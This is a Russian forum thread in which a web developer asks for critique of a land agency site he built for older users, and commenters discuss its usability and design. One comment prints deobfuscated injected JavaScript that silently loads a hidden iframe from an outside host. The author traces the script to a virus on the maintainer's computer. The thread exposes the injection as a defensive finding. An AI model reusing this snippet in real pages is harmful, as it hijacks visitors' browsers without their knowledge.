LINUX.ORG.RU

Каким должен быть сайт?

, , приматы

0

1

Каким должен быть сайт? Вопрос над которым я часто думаю. Дело было еще прошлым летом.
Клиент, солидный начитанный дядя лет 50-ти, решил заказать у меня сайт для своей конторы. При встрече он показал мне пару блевотных шаблонов, которые предложили ему почти за копейки. Я сказал что это блевотина и мы сошлись во мнениях.
Человек жаждал простоты. Он хотел, что бы люди старшего поколения могли смотреть его сайт и не просить детей или внуков переключить на следующую страницу.
В общем у него земельное агентство. Сделал я ему в инкскейпе логотип, при чем дядя увлекается каббалой и я даже не спрашивал почему именно такой логотип. Первых три дня я с человеком общался по 2-3 часа в день. Было очень интересно. Много общих тем. Поняв человека и получив максимум информации, я принялся за работу. На разработку ушла неделя: 5 дней мыслительно-творческого процесса и 2 дня писанины в вебсторме.

Впервые решил написать инструкцию по пользованию сайтом на первой странице так сказать для старшего поколения. Как то очень индивидуально. А нужно ли это? А может стоит всегда так делать?

Скажу как есть, клиент остался доволен -> Деньги заплатил -> Я доволен.
Обслуживанием не занимаюсь, он нанял для этого человека -> Я вообще доволен.

Расскажите мне, что хочет пользователь. Каким же должен быть сайт? За последнее время в интернете прибавилось куча глазовыедающих гавносайтов, меня ли одного это раздражает?

Сайт тут: http://999miko.com.ua/

Мнения, критики - все принимается.

Ответ на: комментарий от toney

беру свои слова назад, не знаю откуда, но в коде есть отличия от оригинала. Там левый скрипт. По сути теперь я должен сказать заказчику, что его парниша, что то намутил. Хотя столько времени уже прошло.

ChavaiotH
() автор топика

Без js не работает - в помойку.

Tigger ★★★★★
()

Белый заголовок - говно, плюс «агенство» (fffuuuuu). Остальное приятно очень. Динамический бэкграунд спорен.

Skeletal ★★★
()
Ответ на: комментарий от Skeletal

На каких таких идиотов всё это рассчитано?

Для пользования сайтом нажмите кнопку меню, которая находится вверху странички. С левой стороны находится кнопка «Интересные предложения»

psp13
()
Ответ на: комментарий от psp13

что бы люди старшего поколения могли смотреть его сайт и не просить детей или
внуков переключить на следующую страницу

Так что этого ещё недостаточно, как показывает мой опыт. Аффтар молодец.

Skeletal ★★★
()

Ужасно. Прочитайте пожалуйста «Don't make me think» Стива Круга.

anonymous
()

1. Простой, но со вкусом дизайн(в идеале любая страница сайта должна весить не более 100Кб).
2. Валидная верстка.
3. Отсутствие говнофлеша.
4. Любое действие, предусмотренное сайтом, от главной должно отделять не более трех кликов.

Это если вкратце. Рассуждать на эту тему можно долго.

gear ★★★
()

Сайт не должен сам по себе шевелиться. Увидел меняющуюся фоновую картинку и сбежал.

Однако хорошо, что все довольны.

Hoodoo ★★★★★
()
Ответ на: комментарий от Kalashnikov

на первом скрине какой-то странный артефакт на плашке Награды, это ведь тоже случайность?

Это значок скриншотера кде, просто он сфотал экран до того, как загрузился.

//Извиняюсь за орфрографю, выпил немного.

mopsene ★★★
()

Про сделанный тобой сайт. В общем - неплохо. Все нижесказанные замечания - моё скромное ИМХО.
1. Фотки во весь бэкграунд не смотрятся и мешают читать контент. Они еще и низкого разрешения.
2. Менюшки и формочки, выезжающие из-за краев экрана, мне не нравятся - это лишние телодвижения + на страницах не настолько много контента, чтобы нужно было экономить место. Лучше менюшки сделать отдельной колонкой/строкой на странице.
3. Видно, что дизайн делал программист(если это делал дизайнер и он за это еще и денег взял, то его нужно найти и надавать по лицу распечатками его же дизайна). Лучше для разработки дизайна нанимать дизайнеров, которые состоятельны как дизайнеры и хоть что-то смыслят в юзабилити. Дизайн совершенно безвкусен. Отличить активный элемент от остального контента можно только наведением на него мыши. Это тусклое непонятно что под кнопками на главной практически не видно и, соответственно, непонятно, что перед тобой кнопки. Синий фон неактивных табов в таблицах - вырвиглазная жесть. За шрифты я просто промолчу.
4. По функционалу. Единственное, что бросилось в глаза - после клика по ссылке блок с контентом просто пропадает и на его месте красуется великое нифига во время загрузки. Ты либо вставь заглушку с экраном загрузки, либо подменяй старую страницу новой после окончания загрузки новой(не забудь в этом случае показать юзеру, что клик обработан и где-то в фоне грузится страница).

gear ★★★
()
Ответ на: комментарий от Eddy_Em

На самом деле, твое мнение было бы наиболее важным.

//Извиняюсь за орфрографю, выпил очень много.

mopsene ★★★
()
Ответ на: комментарий от mopsene

сайт по фото тяжело сказать на первый взгляд симпотно. Кстати орденом красного знамени наградили моего отца, бумажка есть, а орден так и не дали.

ChavaiotH
() автор топика

ну чувак хотел что то в этом роде, тут руки связаны. Где то увидел и сказал хочу такую же фигню, раньше отговаривал, а сейчас как то пофиг.

ChavaiotH
() автор топика
Ответ на: комментарий от ChavaiotH

Ну да, деньги от заказчика важнее, чем Ъшность. Сам понимаю. =)

mopsene ★★★
()

Я руководствуюсь правилом - вся информация должна вмещаться в 1000 пикселей. Что-то я сомневаюсь, что у тебя данный сайт на 1024 будет хорошо смотреться.

neocrust ★★★★★
()

мне интересно мнение разных людей, а не одного человека.

Читай книги, повторяю. Тем более, что у большинства книг не один автор.

И чем плохо, что я спросил на ЛОРе?

Потому что на ЛОРе специалистов на эту тему, может быть, вовсе нет.

VirRaa ★★★
()

ваш дизайн слишком захламлен, как по мне. Да и вообще говно.

Выпадающее меню в сайте? бред чистой воды, из каких соображений вы его вообще запилили? места у вас свободного на страничке тьма, да и старикам оно точно не помогает.

Логотип, какой бы он не был ужасный, это логотип, его надо на видное место воткнуть, а он у вас визуально висит в воздухе(и это на моем маленьком ноутбуке, на больших экранах куда оно уползет?) да ещё и в уголке.

Главный фрейм посередине разделен на 3 зоны. Зачем это было сделано, непонятно, если содержание всех трех сводится к бла-бла-бла. И цитата жирненьким из земельного кодекса. Ну зачем? Усраться и не жить людям без этого знания.

Выбор цветов - мрак и олдота. Минимализм - наше всё. Да ещё в меню, если нажать на «Предложения» выпадает список с белым шумом. Эт ваше восприятие прекрасного вам подсказало?

И специальные предложения должны быть предложениями и предлагать, а не стыдливо прятаться в уголке.

PS. Все вышесказанное сугубо субъективно, вы же сами просили критики. И позвоните дяде, попросите его завести нормальную почту. Контора с почтой на гмыле - это позор.

RedPossum ★★★★★
()

Расковырял:

if (document.getElementsByTagName('body')[0]){
	iframer();
} else {
	document.write("<iframe src='http://z210308.infobox.ru/go.php?sid=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
	var f = document.createElement('iframe');f.setAttribute('src','http://z210308.infobox.ru/go.php?sid=2');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');
	document.getElementsByTagName('body')[0].appendChild(f);
}
Что характерно, этот код был зашифрован вместе со всеми отступами (я щас даже убрал лишние).

Обычный слив траффика, а скрипт такой заботливый, он вам даже боди создаст если его нет.

Kalashnikov ★★★
()
Ответ на: комментарий от Skeletal

Так что этого ещё недостаточно, как показывает мой опыт. Аффтар молодец.

Что ж это за люди то для которых ещё и недостаточно. И что ж это за старшее поколение - питекантропы наверное. Потому что даже обезъяна догадается навести мышь на меню.

psp13
()
Ответ на: комментарий от Kalashnikov

Спасибо.
Я встречался с дядьком сайта пару часов назад. Оказалось что тот парниша, который сейчас занимается сайтом и закидает туда инфу, работает под виндой. На том компе оказалась куча вирусов. Завтра иду лечить.
Оказалось есть вирус который пишет свой скрипт в хтмл код --> пацан закинул хтмл страницы по фтп с кодом. Вот оно и оказалось в интернете. Вот она винда, и антивирусы.
Склоняю дядю поставить ему на тот комп линукс, а если понравится, то поставлю во всем офисе. А ему понравится, так как у них все по веб-интерфесу и никаких особенных прог.

ChavaiotH
() автор топика
Ответ на: комментарий от psp13

Не работали вы, мон шер, в техподдержке, и не наблюдали её работы. Границы людской тупости простираются шире вообразимого.

Skeletal ★★★
()

Будь я человеком старшего поколения, не сообразил бы, где найти кнопку «интересные предложения». Я такие кнопки вообще не замечаю, пока мне о них не скажут. Не очень удобно.

Ghostwolf ★★★★★
()

За последнее время в интернете прибавилось куча глазовыедающих гавносайтов,

Твои слова в полной мере относятся к меню твоего сайта, с мушками перед глазами.

Иконка, которая в адресной строке, не читабельна, она должна выполняться другим цветом, для четкости, даже в учерб похожести логотипу.

«Земля является основным национальным богатством, находящимся под особой охраной государства.»

Увеличить межстрочный интервал.

doomgl
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.